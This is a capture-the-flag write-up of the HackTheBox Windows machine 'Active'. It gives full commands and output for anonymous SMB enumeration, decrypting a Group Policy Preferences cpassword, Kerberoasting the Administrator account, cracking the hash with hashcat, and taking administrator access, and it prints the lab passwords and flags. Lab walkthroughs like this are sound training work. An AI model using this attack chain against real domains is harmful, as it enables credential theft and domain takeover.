Active
#ActiveDirectory #Default_Credentials #Weak_Permissions #Anonymous_Access
Active is an easy-rated Windows machine from HackTheBox, created by eks and mrb3n. In the current post, my IP is 10.10.14.210, and the target IP is 10.129.38.41
Recon
The first steps are about getting basic information about the target, by using nmap and searching information from the website.
ping -c 1 10.129.38.41PING 10.129.38.41 (10.129.38.41) 56(84) bytes of data.
64 bytes from 10.129.38.41: icmp_seq=1 ttl=63 time=202 ms
--- 10.129.38.41 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 202.335/202.335/202.335/0.000 msWhat a weird TTL for a Windows Machine...
nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.38.41Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 126
88/tcp open kerberos-sec syn-ack ttl 126
135/tcp open msrpc syn-ack ttl 126
139/tcp open netbios-ssn syn-ack ttl 126
389/tcp open ldap syn-ack ttl 126
445/tcp open microsoft-ds syn-ack ttl 126
464/tcp open kpasswd5 syn-ack ttl 126
593/tcp open http-rpc-epmap syn-ack ttl 126
636/tcp open ldapssl syn-ack ttl 126
3268/tcp open globalcatLDAP syn-ack ttl 126
3269/tcp open globalcatLDAPssl syn-ack ttl 126
5722/tcp open msdfsr syn-ack ttl 126
9389/tcp open adws syn-ack ttl 126
47001/tcp open winrm syn-ack ttl 126
49153/tcp open unknown syn-ack ttl 126
49154/tcp open unknown syn-ack ttl 126
49155/tcp open unknown syn-ack ttl 126
49157/tcp open unknown syn-ack ttl 126
49158/tcp open unknown syn-ack ttl 126
49162/tcp open unknown syn-ack ttl 126
49166/tcp open unknown syn-ack ttl 126
49168/tcp open unknown syn-ack ttl 126And then we try to get the version and run basic scripts with Nmap in each port.
nmap -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49153,49154,49155,49157,49158,49162,49166,49168 10.129.38.41Nmap scan report for 10.129.38.41
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-26 21:17:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-08-26T21:18:39
|_ start_date: 2024-08-26T18:53:23Quite a few open ports! Normal in Windows... now, we are interested in the port that manages the SMB environment; these are ports 139 and 445. Therefore, we will use basic tools for their exploration.
SMB Enumeration
enum4linux -a 10.129.38.41=================================( Share Enumeration on 10.129.38.41 )================
do_connect: Connection to 10.129.38.41 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.129.38.41
//10.129.38.41/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/C$ Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/IPC$ Mapping: OK Listing: DENIED Writing: N/A
//10.129.38.41/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/Replication Mapping: OK Listing: OK Writing: N/A
//10.129.38.41/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/Users Mapping: DENIED Listing: N/A Writing: N/AThe only relevant information comes from "Share Enumeration," where we list the shared resources and determine which ones are visible to the Anonymous user; in this case, it is "Replication." Now, we will review it using smbclient or smbmap.
Exploring Replication
With smbclient, you can explore manually, but with smbmap, you can recursively extract all the files that you have permission to read.
smbclient //10.129.38.41/Replication -U ""%""smbmap -H 10.129.38.41 -s Replication -r --depth 10 ./Replication
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 active.htb
./Replication//active.htb
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 scripts
./Replication//active.htb/DfsrPrivate
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Installing
./Replication//active.htb/Policies
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
fr--r--r-- 23 Sat Jul 21 10:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Group Policy
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 USER
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
fr--r--r-- 119 Sat Jul 21 10:38:11 2018 GPE.INI
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Microsoft
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Preferences
fr--r--r-- 2788 Sat Jul 21 10:38:11 2018 Registry.pol
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Windows NT
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 SecEdit
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
fr--r--r-- 1098 Sat Jul 21 10:38:11 2018 GptTmpl.inf
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Groups
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
fr--r--r-- 533 Sat Jul 21 10:38:11 2018 Groups.xml
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
fr--r--r-- 22 Sat Jul 21 10:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 USER
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Microsoft
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 Windows NT
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 SecEdit
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 10:37:44 2018 ..
fr--r--r-- 3722 Sat Jul 21 10:38:11 2018 GptTmpl.infFrom the entire list of folders and files, the only thing that seems relevant is "Groups.xml." Let's access and explore the file.
smbclient //10.129.38.41/Replication -U ""%""$ cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
$ get Groups.xml
$ exitcat Groups.xml | xmllint --format -<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
</User>
</Groups>The Groups.xml file appears to be a log document created when a user is added with a group related to Group Policy Preferences (GPP). This is valuable information because, in this context, to use the active.htb user, we need to decrypt the password.
Password Decryption
Since it is a cpassword from GPP (Group Policy Preferences), we can use the following method to decrypt it:
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQGPPstillStandingStrong2k18Enumeration with active.htb
Now that we have a username and password, we'll use enum4linux again to see what capabilities we have with these credentials.
smbmap -H 10.129.38.41 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18[+] IP: 10.129.38.41:445 Name: 10.129.38.41 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLYFrom this list, "Users" seems to be the most interesting... As usual, the flag is likely to be on the desktop. It is important to keep in mind that to log in, you need to use the group associated with the password. In this case, the group is "SVC_TGS."
smbclient //10.129.38.41/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18$ cd \SVC_TGS\Desktop\
$ get user.txt
$ exitcat user.txt13a4dcb3da9553209d0833afc10a437dWithin the Impacket suite, there's a script called GetUserSPNs.py that is very useful for finding users vulnerable to Kerberoasting. This attack targets Service Principal Names (SPNs) associated with user accounts in Active Directory that are used for Kerberos authentication. {password: GPPstillStandingStrong2k18}
GetUserSPNs.py -request -dc-ip 10.129.38.41 active.htb/SVC_TGS -save -outputfile GetUserSPNs.outServicePrincipalName Name MemberOf PasswordLastSet
LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 19:06:40.351723 2024-08-26 18:54:29.034950cat GetUserSPNs.out$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b9207b9c412fc833f5e326aa92d7950a$f14fefb2e71f22d789a35b624f15741450bbcdfc295544676280b65dd923ed4f9f2756143bbd18be531bba21f4a9b217e7a6e9fec4dbcacb1cb38f2a23ed3b45da0e81c7384b458b69bdff421c5a9282710a387560f78538f997f2ca25083c16ea3330ce49e0d924d67dc896c90116336f7e988bd3e8c2fed0b28d312c9de635c0ad97c15e42980da8494be7dab3c811da02d641e5ef676319ca530e1a82245c7e4103dbbcf516af7b82050121f78243f64137166a55f199c2925ae4f08df3d842b8753e7aabe0a72811c6f83d5ecc7f6e112266e3fa0df1ffbc4a979ceb991e58cbfa8cbf9b0d6a0bcee4a98e1162d808c08aba29e97b337fb431799b0fcc2589a70c17ada8faa13427bfb71b44d21ff5726571ef94f2c310812fcb4c20460bb3e4e0304bb8502fe5f502594a516285bd3f633457f46e63c69802b0c029533ef2802de05534d02491e47b917441ffe61a608899649a6c3ccca3baec687881845d1f8017bb87966a6fc937cd6abdb5b49f1925a0df7c1ac16f2c69280a0a84aac155dedc90924abf2d0de75238012cae0701a99a2e9b5e790a877074431e9fafb10dd054a6bbf17eddec1b91ac372b8b61ba9f963a92db874589a396410c228cbae268a35dc2652784331ef17a4b13069582a6bafb79b7efec10c582af2a42095f893227e4476149ddd5e1c4d3e2d49ebf629592a301fff6c71dd4bcf1d707bd85c343e6ef4943e3cd5d5217769abac21ae86e4eff3502120858f61f466145045c880c5ec85ea551e22306f455d3a3a2a94700b599359fc7f8cabc65d0a7b42384ce1ce985edb578b90a5af0467a0c2cda4b61fd91671d1e4d6a95b4d23736e6389ba43a173c0ef5a7446dcce840a7611bfe36c5a5460e6c150cf188aef2521643494a3a82405354f70bdc20facdb5d698f319057a5dc64944381d65fef47164b417390573217de4d7461e8415782e551d0072a2a456e550f95fb09632d8a4a30b3b720011da396e02acbb06a963aef41a497becd7d00adea7356e02ab3e82a621522fc9604b5488a2142b0862e7ea886d61c528b7705297e43809fa644abedc604afa249b9d57eba57619e9fb69b4c95a504d3e48d898a5b7cb75e1fb1f9108ead613618f77f90e50f2cad7da4fd435f5b286c87ba5b4813ce7570188188351826dfef96884938cbe77a40fe16023dd046cb3d419df2c0b7fdf1067a0191bf49a855381cc102f537f81d0c89f12b1f97cbad951510b477a37c0Now we just need to decrypt the hash. The good news is that the script outputs the data in a format compatible with Hashcat, making it easier to crack the hash.
$ hashcat -m 13100 -a 0 GetUserSPNs.out /shared/payload/rockyou.txt --force
$ hashcat -m 13100 -a 0 GetUserSPNs.out /shared/payload/rockyou.txt --force --show$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b9207b9c412fc833f5e326aa92d7950a{...}{...}7c0:Ticketmaster1968Great! With the password "Ticketmaster1968," we can now check what the admin account has access to—potentially everything. The next step is to access the SMB share and extract the flag.
smbmap -H 10.129.38.41 -d active.htb -u administrator -p Ticketmaster1968[+] IP: 10.129.38.41:445Name: 10.129.38.41 Status: ADMIN!!!
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ, WRITE Logon server share
Replication READ ONLY
SYSVOL READ, WRITE Logon server share
Users READ ONLYWith admin status confirmed, you have elevated privileges. When exploring the SMB shares, the $C share represents the root of the C: drive, which is indeed the most important and often contains critical files, including potential flags or sensitive information.
smbclient //10.129.38.41/C$ -U active.htb\\administrator%Ticketmaster1968$ cd \users\administrator\desktop\
$ get root.txt
$ exitcat root.txtce53b45c12214816f72f7f69ae9ecce4Alternativa
With the credentials confirmed as valid, you can use them to gain shell access on the target system. Given the password "Ticketmaster1968," you can attempt to connect via different methods like SMB or WinRM to obtain a shell.
psexec.py active.htb/administrator@10.10.10.100Last updated